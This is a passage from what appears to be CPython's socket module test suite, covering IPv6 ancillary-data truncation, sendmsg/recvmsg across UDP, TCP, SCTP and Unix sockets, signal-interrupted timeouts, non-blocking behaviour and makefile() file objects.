@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testRecvTrafficClassAndHopLimitCMSG_SPACE(self):
# Test receiving traffic class and hop limit, using
# CMSG_SPACE() to calculate buffer size.
self.checkTrafficClassAndHopLimit(
ancbufsize=socket.CMSG_SPACE(SIZEOF_INT) * 2)
@testRecvTrafficClassAndHopLimitCMSG_SPACE.client_skip
def _testRecvTrafficClassAndHopLimitCMSG_SPACE(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket.socket, "sendmsg")
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSetTrafficClassAndHopLimit(self):
# Test setting traffic class and hop limit on outgoing packet,
# and receiving them at the other end.
self.checkTrafficClassAndHopLimit(ancbufsize=10240,
maxhop=self.hop_limit)
@testSetTrafficClassAndHopLimit.client_skip
def _testSetTrafficClassAndHopLimit(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.assertEqual(
self.sendmsgToServer([MSG],
[(socket.IPPROTO_IPV6, socket.IPV6_TCLASS,
array.array("i", [self.traffic_class])),
(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
array.array("i", [self.hop_limit]))]),
len(MSG))
@requireAttrs(socket.socket, "sendmsg")
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testOddCmsgSize(self):
# Try to send ancillary data with first item one byte too
# long. Fall back to sending with correct size if this fails,
# and check that second item was handled correctly.
self.checkTrafficClassAndHopLimit(ancbufsize=10240,
maxhop=self.hop_limit)
@testOddCmsgSize.client_skip
def _testOddCmsgSize(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
try:
nbytes = self.sendmsgToServer(
[MSG],
[(socket.IPPROTO_IPV6, socket.IPV6_TCLASS,
array.array("i", [self.traffic_class]).tobytes() + b"\x00"),
(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
array.array("i", [self.hop_limit]))])
except OSError as e:
self.assertIsInstance(e.errno, int)
nbytes = self.sendmsgToServer(
[MSG],
[(socket.IPPROTO_IPV6, socket.IPV6_TCLASS,
array.array("i", [self.traffic_class])),
(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
array.array("i", [self.hop_limit]))])
self.assertEqual(nbytes, len(MSG))
# Tests for proper handling of truncated ancillary data
def checkHopLimitTruncatedHeader(self, ancbufsize, ignoreflags=0):
# Receive hop limit into ancbufsize bytes of ancillary data
# space, which should be too small to contain the ancillary
# data header (if ancbufsize is None, pass no second argument
# to recvmsg()). Check that data is MSG, MSG_CTRUNC is set
# (unless included in ignoreflags), and no ancillary data is
# returned.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.misc_event.set()
args = () if ancbufsize is None else (ancbufsize,)
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), *args)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC,
ignore=ignoreflags)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testCmsgTruncNoBufSize(self):
# Check that no ancillary data is received when no ancillary
# buffer size is provided.
self.checkHopLimitTruncatedHeader(ancbufsize=None,
# BSD seems to set
# MSG_CTRUNC only if an item
# has been partially
# received.
ignoreflags=socket.MSG_CTRUNC)
@testCmsgTruncNoBufSize.client_skip
def _testCmsgTruncNoBufSize(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTrunc0(self):
# Check that no ancillary data is received when ancillary
# buffer size is zero.
self.checkHopLimitTruncatedHeader(ancbufsize=0,
ignoreflags=socket.MSG_CTRUNC)
@testSingleCmsgTrunc0.client_skip
def _testSingleCmsgTrunc0(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
# Check that no ancillary data is returned for various non-zero
# (but still too small) buffer sizes.
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTrunc1(self):
self.checkHopLimitTruncatedHeader(ancbufsize=1)
@testSingleCmsgTrunc1.client_skip
def _testSingleCmsgTrunc1(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTrunc2Int(self):
self.checkHopLimitTruncatedHeader(ancbufsize=2 * SIZEOF_INT)
@testSingleCmsgTrunc2Int.client_skip
def _testSingleCmsgTrunc2Int(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTruncLen0Minus1(self):
self.checkHopLimitTruncatedHeader(ancbufsize=socket.CMSG_LEN(0) - 1)
@testSingleCmsgTruncLen0Minus1.client_skip
def _testSingleCmsgTruncLen0Minus1(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTruncInData(self):
# Test truncation of a control message inside its associated
# data. The message may be returned with its data truncated,
# or not returned at all.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(
self.serv_sock, len(MSG), socket.CMSG_LEN(SIZEOF_INT) - 1)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC)
self.assertLessEqual(len(ancdata), 1)
if ancdata:
cmsg_level, cmsg_type, cmsg_data = ancdata[0]
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
self.assertEqual(cmsg_type, socket.IPV6_HOPLIMIT)
self.assertLess(len(cmsg_data), SIZEOF_INT)
@testSingleCmsgTruncInData.client_skip
def _testSingleCmsgTruncInData(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
def checkTruncatedSecondHeader(self, ancbufsize, ignoreflags=0):
# Receive traffic class and hop limit into ancbufsize bytes of
# ancillary data space, which should be large enough to
# contain the first item, but too small to contain the header
# of the second. Check that data is MSG, MSG_CTRUNC is set
# (unless included in ignoreflags), and only one ancillary
# data item is returned.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVTCLASS, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), ancbufsize)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC,
ignore=ignoreflags)
self.assertEqual(len(ancdata), 1)
cmsg_level, cmsg_type, cmsg_data = ancdata[0]
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
self.assertIn(cmsg_type, {socket.IPV6_TCLASS, socket.IPV6_HOPLIMIT})
self.assertEqual(len(cmsg_data), SIZEOF_INT)
a = array.array("i")
a.frombytes(cmsg_data)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], 255)
# Try the above test with various buffer sizes.
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTrunc0(self):
self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT),
ignoreflags=socket.MSG_CTRUNC)
@testSecondCmsgTrunc0.client_skip
def _testSecondCmsgTrunc0(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTrunc1(self):
self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT) + 1)
@testSecondCmsgTrunc1.client_skip
def _testSecondCmsgTrunc1(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTrunc2Int(self):
self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT) +
2 * SIZEOF_INT)
@testSecondCmsgTrunc2Int.client_skip
def _testSecondCmsgTrunc2Int(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTruncLen0Minus1(self):
self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT) +
socket.CMSG_LEN(0) - 1)
@testSecondCmsgTruncLen0Minus1.client_skip
def _testSecondCmsgTruncLen0Minus1(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecomdCmsgTruncInData(self):
# Test truncation of the second of two control messages inside
# its associated data.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVTCLASS, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(
self.serv_sock, len(MSG),
socket.CMSG_SPACE(SIZEOF_INT) + socket.CMSG_LEN(SIZEOF_INT) - 1)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC)
cmsg_types = {socket.IPV6_TCLASS, socket.IPV6_HOPLIMIT}
cmsg_level, cmsg_type, cmsg_data = ancdata.pop(0)
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
cmsg_types.remove(cmsg_type)
self.assertEqual(len(cmsg_data), SIZEOF_INT)
a = array.array("i")
a.frombytes(cmsg_data)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], 255)
if ancdata:
cmsg_level, cmsg_type, cmsg_data = ancdata.pop(0)
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
cmsg_types.remove(cmsg_type)
self.assertLess(len(cmsg_data), SIZEOF_INT)
self.assertEqual(ancdata, [])
@testSecomdCmsgTruncInData.client_skip
def _testSecomdCmsgTruncInData(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
# Derive concrete test classes for different socket types.
class SendrecvmsgUDPTestBase(SendrecvmsgDgramFlagsBase,
SendrecvmsgConnectionlessBase,
ThreadedSocketTestMixin, UDPTestBase):
pass
@requireAttrs(socket.socket, "sendmsg")
class SendmsgUDPTest(SendmsgConnectionlessTests, SendrecvmsgUDPTestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
class RecvmsgUDPTest(RecvmsgTests, SendrecvmsgUDPTestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
class RecvmsgIntoUDPTest(RecvmsgIntoTests, SendrecvmsgUDPTestBase):
pass
class SendrecvmsgUDP6TestBase(SendrecvmsgDgramFlagsBase,
SendrecvmsgConnectionlessBase,
ThreadedSocketTestMixin, UDP6TestBase):
def checkRecvmsgAddress(self, addr1, addr2):
# Called to compare the received address with the address of
# the peer, ignoring scope ID
self.assertEqual(addr1[:-1], addr2[:-1])
@requireAttrs(socket.socket, "sendmsg")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireSocket("AF_INET6", "SOCK_DGRAM")
class SendmsgUDP6Test(SendmsgConnectionlessTests, SendrecvmsgUDP6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgUDP6Test(RecvmsgTests, SendrecvmsgUDP6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgIntoUDP6Test(RecvmsgIntoTests, SendrecvmsgUDP6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireAttrs(socket, "IPPROTO_IPV6")
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgRFC3542AncillaryUDP6Test(RFC3542AncillaryTest,
SendrecvmsgUDP6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireAttrs(socket, "IPPROTO_IPV6")
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgIntoRFC3542AncillaryUDP6Test(RecvmsgIntoMixin,
RFC3542AncillaryTest,
SendrecvmsgUDP6TestBase):
pass
class SendrecvmsgTCPTestBase(SendrecvmsgConnectedBase,
ConnectedStreamTestMixin, TCPTestBase):
pass
@requireAttrs(socket.socket, "sendmsg")
class SendmsgTCPTest(SendmsgStreamTests, SendrecvmsgTCPTestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
class RecvmsgTCPTest(RecvmsgTests, RecvmsgGenericStreamTests,
SendrecvmsgTCPTestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
class RecvmsgIntoTCPTest(RecvmsgIntoTests, RecvmsgGenericStreamTests,
SendrecvmsgTCPTestBase):
pass
class SendrecvmsgSCTPStreamTestBase(SendrecvmsgSCTPFlagsBase,
SendrecvmsgConnectedBase,
ConnectedStreamTestMixin, SCTPStreamBase):
pass
@requireAttrs(socket.socket, "sendmsg")
@requireSocket("AF_INET", "SOCK_STREAM", "IPPROTO_SCTP")
class SendmsgSCTPStreamTest(SendmsgStreamTests, SendrecvmsgSCTPStreamTestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@requireSocket("AF_INET", "SOCK_STREAM", "IPPROTO_SCTP")
class RecvmsgSCTPStreamTest(RecvmsgTests, RecvmsgGenericStreamTests,
SendrecvmsgSCTPStreamTestBase):
def testRecvmsgEOF(self):
try:
super(RecvmsgSCTPStreamTest, self).testRecvmsgEOF()
except OSError as e:
if e.errno != errno.ENOTCONN:
raise
self.skipTest("sporadic ENOTCONN (kernel issue?) - see issue #13876")
@requireAttrs(socket.socket, "recvmsg_into")
@requireSocket("AF_INET", "SOCK_STREAM", "IPPROTO_SCTP")
class RecvmsgIntoSCTPStreamTest(RecvmsgIntoTests, RecvmsgGenericStreamTests,
SendrecvmsgSCTPStreamTestBase):
def testRecvmsgEOF(self):
try:
super(RecvmsgIntoSCTPStreamTest, self).testRecvmsgEOF()
except OSError as e:
if e.errno != errno.ENOTCONN:
raise
self.skipTest("sporadic ENOTCONN (kernel issue?) - see issue #13876")
class SendrecvmsgUnixStreamTestBase(SendrecvmsgConnectedBase,
ConnectedStreamTestMixin, UnixStreamBase):
pass
@requireAttrs(socket.socket, "sendmsg")
@requireAttrs(socket, "AF_UNIX")
class SendmsgUnixStreamTest(SendmsgStreamTests, SendrecvmsgUnixStreamTestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@requireAttrs(socket, "AF_UNIX")
class RecvmsgUnixStreamTest(RecvmsgTests, RecvmsgGenericStreamTests,
SendrecvmsgUnixStreamTestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
@requireAttrs(socket, "AF_UNIX")
class RecvmsgIntoUnixStreamTest(RecvmsgIntoTests, RecvmsgGenericStreamTests,
SendrecvmsgUnixStreamTestBase):
pass
@requireAttrs(socket.socket, "sendmsg", "recvmsg")
@requireAttrs(socket, "AF_UNIX", "SOL_SOCKET", "SCM_RIGHTS")
class RecvmsgSCMRightsStreamTest(SCMRightsTest, SendrecvmsgUnixStreamTestBase):
pass
@requireAttrs(socket.socket, "sendmsg", "recvmsg_into")
@requireAttrs(socket, "AF_UNIX", "SOL_SOCKET", "SCM_RIGHTS")
class RecvmsgIntoSCMRightsStreamTest(RecvmsgIntoMixin, SCMRightsTest,
SendrecvmsgUnixStreamTestBase):
pass
# Test interrupting the interruptible send/receive methods with a
# signal when a timeout is set. These tests avoid having multiple
# threads alive during the test so that the OS cannot deliver the
# signal to the wrong one.
class InterruptedTimeoutBase(unittest.TestCase):
# Base class for interrupted send/receive tests. Installs an
# empty handler for SIGALRM and removes it on teardown, along with
# any scheduled alarms.
def setUp(self):
super().setUp()
orig_alrm_handler = signal.signal(signal.SIGALRM,
lambda signum, frame: 1 / 0)
self.addCleanup(signal.signal, signal.SIGALRM, orig_alrm_handler)
# Timeout for socket operations
timeout = 4.0
# Provide setAlarm() method to schedule delivery of SIGALRM after
# given number of seconds, or cancel it if zero, and an
# appropriate time value to use. Use setitimer() if available.
if hasattr(signal, "setitimer"):
alarm_time = 0.05
def setAlarm(self, seconds):
signal.setitimer(signal.ITIMER_REAL, seconds)
else:
# Old systems may deliver the alarm up to one second early
alarm_time = 2
def setAlarm(self, seconds):
signal.alarm(seconds)
# Require siginterrupt() in order to ensure that system calls are
# interrupted by default.
@requireAttrs(signal, "siginterrupt")
@unittest.skipUnless(hasattr(signal, "alarm") or hasattr(signal, "setitimer"),
"Don't have signal.alarm or signal.setitimer")
class InterruptedRecvTimeoutTest(InterruptedTimeoutBase, UDPTestBase):
# Test interrupting the recv*() methods with signals when a
# timeout is set.
def setUp(self):
super().setUp()
self.serv.settimeout(self.timeout)
def checkInterruptedRecv(self, func, *args, **kwargs):
# Check that func(*args, **kwargs) raises
# errno of EINTR when interrupted by a signal.
try:
self.setAlarm(self.alarm_time)
with self.assertRaises(ZeroDivisionError) as cm:
func(*args, **kwargs)
finally:
self.setAlarm(0)
def testInterruptedRecvTimeout(self):
self.checkInterruptedRecv(self.serv.recv, 1024)
def testInterruptedRecvIntoTimeout(self):
self.checkInterruptedRecv(self.serv.recv_into, bytearray(1024))
def testInterruptedRecvfromTimeout(self):
self.checkInterruptedRecv(self.serv.recvfrom, 1024)
def testInterruptedRecvfromIntoTimeout(self):
self.checkInterruptedRecv(self.serv.recvfrom_into, bytearray(1024))
@requireAttrs(socket.socket, "recvmsg")
def testInterruptedRecvmsgTimeout(self):
self.checkInterruptedRecv(self.serv.recvmsg, 1024)
@requireAttrs(socket.socket, "recvmsg_into")
def testInterruptedRecvmsgIntoTimeout(self):
self.checkInterruptedRecv(self.serv.recvmsg_into, [bytearray(1024)])
# Require siginterrupt() in order to ensure that system calls are
# interrupted by default.
@requireAttrs(signal, "siginterrupt")
@unittest.skipUnless(hasattr(signal, "alarm") or hasattr(signal, "setitimer"),
"Don't have signal.alarm or signal.setitimer")
class InterruptedSendTimeoutTest(InterruptedTimeoutBase,
ThreadSafeCleanupTestCase,
SocketListeningTestMixin, TCPTestBase):
# Test interrupting the interruptible send*() methods with signals
# when a timeout is set.
def setUp(self):
super().setUp()
self.serv_conn = self.newSocket()
self.addCleanup(self.serv_conn.close)
# Use a thread to complete the connection, but wait for it to
# terminate before running the test, so that there is only one
# thread to accept the signal.
cli_thread = threading.Thread(target=self.doConnect)
cli_thread.start()
self.cli_conn, addr = self.serv.accept()
self.addCleanup(self.cli_conn.close)
cli_thread.join()
self.serv_conn.settimeout(self.timeout)
def doConnect(self):
self.serv_conn.connect(self.serv_addr)
def checkInterruptedSend(self, func, *args, **kwargs):
# Check that func(*args, **kwargs), run in a loop, raises
# OSError with an errno of EINTR when interrupted by a
# signal.
try:
with self.assertRaises(ZeroDivisionError) as cm:
while True:
self.setAlarm(self.alarm_time)
func(*args, **kwargs)
finally:
self.setAlarm(0)
# Issue #12958: The following tests have problems on OS X prior to 10.7
@support.requires_mac_ver(10, 7)
def testInterruptedSendTimeout(self):
self.checkInterruptedSend(self.serv_conn.send, b"a"*512)
@support.requires_mac_ver(10, 7)
def testInterruptedSendtoTimeout(self):
# Passing an actual address here as Python's wrapper for
# sendto() doesn't allow passing a zero-length one; POSIX
# requires that the address is ignored since the socket is
# connection-mode, however.
self.checkInterruptedSend(self.serv_conn.sendto, b"a"*512,
self.serv_addr)
@support.requires_mac_ver(10, 7)
@requireAttrs(socket.socket, "sendmsg")
def testInterruptedSendmsgTimeout(self):
self.checkInterruptedSend(self.serv_conn.sendmsg, [b"a"*512])
class TCPCloserTest(ThreadedTCPSocketTest):
def testClose(self):
conn, addr = self.serv.accept()
conn.close()
sd = self.cli
read, write, err = select.select([sd], [], [], 1.0)
self.assertEqual(read, [sd])
self.assertEqual(sd.recv(1), b'')
# Calling close() many times should be safe.
conn.close()
conn.close()
def _testClose(self):
self.cli.connect((HOST, self.port))
time.sleep(1.0)
class BasicSocketPairTest(SocketPairTest):
def __init__(self, methodName='runTest'):
SocketPairTest.__init__(self, methodName=methodName)
def _check_defaults(self, sock):
self.assertIsInstance(sock, socket.socket)
if hasattr(socket, 'AF_UNIX'):
self.assertEqual(sock.family, socket.AF_UNIX)
else:
self.assertEqual(sock.family, socket.AF_INET)
self.assertEqual(sock.type, socket.SOCK_STREAM)
self.assertEqual(sock.proto, 0)
def _testDefaults(self):
self._check_defaults(self.cli)
def testDefaults(self):
self._check_defaults(self.serv)
def testRecv(self):
msg = self.serv.recv(1024)
self.assertEqual(msg, MSG)
def _testRecv(self):
self.cli.send(MSG)
def testSend(self):
self.serv.send(MSG)
def _testSend(self):
msg = self.cli.recv(1024)
self.assertEqual(msg, MSG)
class NonBlockingTCPTests(ThreadedTCPSocketTest):
def __init__(self, methodName='runTest'):
self.event = threading.Event()
ThreadedTCPSocketTest.__init__(self, methodName=methodName)
def assert_sock_timeout(self, sock, timeout):
self.assertEqual(self.serv.gettimeout(), timeout)
blocking = (timeout != 0.0)
self.assertEqual(sock.getblocking(), blocking)
if fcntl is not None:
# When a Python socket has a non-zero timeout, it's switched
# internally to a non-blocking mode. Later, sock.sendall(),
# sock.recv(), and other socket operations use a select() call and
# handle EWOULDBLOCK/EGAIN on all socket operations. That's how
# timeouts are enforced.
fd_blocking = (timeout is None)
flag = fcntl.fcntl(sock, fcntl.F_GETFL, os.O_NONBLOCK)
self.assertEqual(not bool(flag & os.O_NONBLOCK), fd_blocking)
def testSetBlocking(self):
# Test setblocking() and settimeout() methods
self.serv.setblocking(True)
self.assert_sock_timeout(self.serv, None)
self.serv.setblocking(False)
self.assert_sock_timeout(self.serv, 0.0)
self.serv.settimeout(None)
self.assert_sock_timeout(self.serv, None)
self.serv.settimeout(0)
self.assert_sock_timeout(self.serv, 0)
self.serv.settimeout(10)
self.assert_sock_timeout(self.serv, 10)
self.serv.settimeout(0)
self.assert_sock_timeout(self.serv, 0)
def _testSetBlocking(self):
pass
@support.cpython_only
def testSetBlocking_overflow(self):
# Issue 15989
import _testcapi
if _testcapi.UINT_MAX >= _testcapi.ULONG_MAX:
self.skipTest('needs UINT_MAX < ULONG_MAX')
self.serv.setblocking(False)
self.assertEqual(self.serv.gettimeout(), 0.0)
self.serv.setblocking(_testcapi.UINT_MAX + 1)
self.assertIsNone(self.serv.gettimeout())
_testSetBlocking_overflow = support.cpython_only(_testSetBlocking)
@unittest.skipUnless(hasattr(socket, 'SOCK_NONBLOCK'),
'test needs socket.SOCK_NONBLOCK')
@support.requires_linux_version(2, 6, 28)
def testInitNonBlocking(self):
# create a socket with SOCK_NONBLOCK
self.serv.close()
self.serv = socket.socket(socket.AF_INET,
socket.SOCK_STREAM | socket.SOCK_NONBLOCK)
self.assert_sock_timeout(self.serv, 0)
def _testInitNonBlocking(self):
pass
def testInheritFlagsBlocking(self):
# bpo-7995: accept() on a listening socket with a timeout and the
# default timeout is None, the resulting socket must be blocking.
with socket_setdefaulttimeout(None):
self.serv.settimeout(10)
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
self.assertIsNone(conn.gettimeout())
def _testInheritFlagsBlocking(self):
self.cli.connect((HOST, self.port))
def testInheritFlagsTimeout(self):
# bpo-7995: accept() on a listening socket with a timeout and the
# default timeout is None, the resulting socket must inherit
# the default timeout.
default_timeout = 20.0
with socket_setdefaulttimeout(default_timeout):
self.serv.settimeout(10)
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
self.assertEqual(conn.gettimeout(), default_timeout)
def _testInheritFlagsTimeout(self):
self.cli.connect((HOST, self.port))
def testAccept(self):
# Testing non-blocking accept
self.serv.setblocking(0)
# connect() didn't start: non-blocking accept() fails
start_time = time.monotonic()
with self.assertRaises(BlockingIOError):
conn, addr = self.serv.accept()
dt = time.monotonic() - start_time
self.assertLess(dt, 1.0)
self.event.set()
read, write, err = select.select([self.serv], [], [], MAIN_TIMEOUT)
if self.serv not in read:
self.fail("Error trying to do accept after select.")
# connect() completed: non-blocking accept() doesn't block
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
self.assertIsNone(conn.gettimeout())
def _testAccept(self):
# don't connect before event is set to check
# that non-blocking accept() raises BlockingIOError
self.event.wait()
self.cli.connect((HOST, self.port))
def testRecv(self):
# Testing non-blocking recv
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
conn.setblocking(0)
# the server didn't send data yet: non-blocking recv() fails
with self.assertRaises(BlockingIOError):
msg = conn.recv(len(MSG))
self.event.set()
read, write, err = select.select([conn], [], [], MAIN_TIMEOUT)
if conn not in read:
self.fail("Error during select call to non-blocking socket.")
# the server sent data yet: non-blocking recv() doesn't block
msg = conn.recv(len(MSG))
self.assertEqual(msg, MSG)
def _testRecv(self):
self.cli.connect((HOST, self.port))
# don't send anything before event is set to check
# that non-blocking recv() raises BlockingIOError
self.event.wait()
# send data: recv() will no longer block
self.cli.sendall(MSG)
class FileObjectClassTestCase(SocketConnectedTest):
"""Unit tests for the object returned by socket.makefile()
self.read_file is the io object returned by makefile() on
the client connection. You can read from this file to
get output from the server.
self.write_file is the io object returned by makefile() on the
server connection. You can write to this file to send output
to the client.
"""
bufsize = -1 # Use default buffer size
encoding = 'utf-8'
errors = 'strict'
newline = None
read_mode = 'rb'
read_msg = MSG
write_mode = 'wb'
write_msg = MSG
def __init__(self, methodName='runTest'):
SocketConnectedTest.__init__(self, methodName=methodName)
def setUp(self):
self.evt1, self.evt2, self.serv_finished, self.cli_finished = [
threading.Event() for i in range(4)]
SocketConnectedTest.setUp(self)
self.read_file = self.cli_conn.makefile(
self.read_mode, self.bufsize,
encoding = self.encoding,
errors = self.errors,
newline = self.newline)
def tearDown(self):
self.serv_finished.set()
self.read_file.close()
self.assertTrue(self.read_file.closed)
self.read_file = None
SocketConnectedTest.tearDown(self)
def clientSetUp(self):
SocketConnectedTest.clientSetUp(self)
self.write_file = self.serv_conn.makefile(
self.write_mode, self.bufsize,
encoding = self.encoding,
errors = self.errors,
newline = self.newline)
def clientTearDown(self):
self.cli_finished.set()
self.write_file.close()
self.assertTrue(self.write_file.closed)
self.write_file = None
SocketConnectedTest.clientTearDown(self)
def testReadAfterTimeout(self):
# Issue #7322: A file object must disallow further reads
# after a timeout has occurred.
self.cli_conn.settimeout(1)
self.read_file.read(3)
# First read raises a timeout
self.assertRaises(socket.timeout, self.read_file.read, 1)
# Second read is disallowed
with self.assertRaises(OSError) as ctx:
self.read_file.read(1)
self.assertIn("cannot read from timed out object", str(ctx.exception))
def _testReadAfterTimeout(self):
self.write_file.write(self.write_msg[0:3])
self.write_file.flush()
self.serv_finished.wait()
def testSmallRead(self):
# Performing small file read test
first_seg = self.read_file.read(len(self.read_msg)-3)
second_seg = self.read_file.read(3)
msg = first_seg + second_seg
self.assertEqual(msg, self.read_msg)
def _testSmallRead(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testFullRead(self):
# read until EOF
msg = self.read_file.read()
self.assertEqual(msg, self.read_msg)
def _testFullRead(self):
self.write_file.write(self.write_msg)
self.write_file.close()
def testUnbufferedRead(self):
# Performing unbuffered file read test
buf = type(self.read_msg)()
while 1:
char = self.read_file.read(1)
if not char:
break
buf += char
self.assertEqual(buf, self.read_msg)
def _testUnbufferedRead(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testReadline(self):
# Performing file readline test
line = self.read_file.readline()
self.assertEqual(line, self.read_msg)
def _testReadline(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testCloseAfterMakefile(self):
# The file returned by makefile should keep the socket open.
self.cli_conn.close()
# read until EOF
msg = self.read_file.read()
self.assertEqual(msg, self.read_msg)
def _testCloseAfterMakefile(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testMakefileAfterMakefileClose(self):
self.read_file.close()
msg = self.cli_conn.recv(len(MSG))
if isinstance(self.read_msg, str):
msg = msg.decode()
self.assertEqual(msg, self.read_msg)
def _testMakefileAfterMakefileClose(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testClosedAttr(self):
